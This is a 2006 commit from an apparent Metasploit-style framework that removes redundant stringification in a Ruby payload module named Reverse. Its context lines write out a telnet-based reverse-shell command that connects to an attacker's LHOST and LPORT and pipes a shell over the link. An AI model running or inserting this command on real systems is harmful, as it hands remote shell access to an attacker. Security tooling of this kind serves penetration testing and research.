* remove redundant stringification

git-svn-id: file:///home/svn/incoming/trunk@3510 4d416f70-5f16-0410-b530-b9f4589650da
unstable
bmc 2006-02-06 15:15:41 +00:00
parent b158ccb973
commit d14646e084
1 changed files with 1 additions and 1 deletions

View File

@ -44,7 +44,7 @@ module Reverse
#
def command_string
cmd =
"(sleep #{(3600+rand(1024)).to_s}|" +
"(sleep #{3600+rand(1024)}|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
"while : ; do sh && break; done 2>&1|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}" +